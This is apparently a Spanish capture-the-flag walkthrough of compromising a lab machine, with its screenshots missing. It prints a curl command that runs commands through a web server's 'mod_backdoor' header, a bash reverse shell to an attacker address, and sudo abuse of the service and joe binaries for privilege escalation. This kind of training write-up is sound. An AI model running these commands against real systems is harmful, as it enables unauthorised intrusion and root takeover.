Hacemos el escaneo de nmap:

Y esto es lo que corre por el puerto 80:

Si hacemos fuzzing web por extensiones de archivos, nos encontramos con un admin.php:

Y dentro de este archivo vemos un apartado llamado loaded modules que nos llama la atención que dice mod_backdoor:

Investigamos por google y nos encontramos este repositorio de github:

Y en este exploit vemos que lo que hace es hacer una petición con requests utilizando la cabecera Backdoor:

Podemos hacer esto mismo con curl de la siguiente forma:

curl -H 'Backdoor: whoami' "192.168.0.67"

Y ejecutamos la reverse shell:

curl -H 'Backdoor: bash -c "bash -i >& /dev/tcp/192.168.0.56/443 0>&1"' "192.168.0.67"

Con el comando sudo -l nos encontramos con el binario service que lo podemos ejecutar como el usuarios laurent:

Y en gtfobins vemos las siguientes instrucciones sobre el binario service:

Lo ejecutamos:

sudo -u laurent /usr/sbin/service ../../bin/bash

Y vemos otra vez que como root ahora podemos ejecutar el binario joe:

Tenemos estas instrucciones en gtfobins:

Una vez ejecutado esto, pulsamos control K y podremos escribir lo siguiente:

Y ya somos root: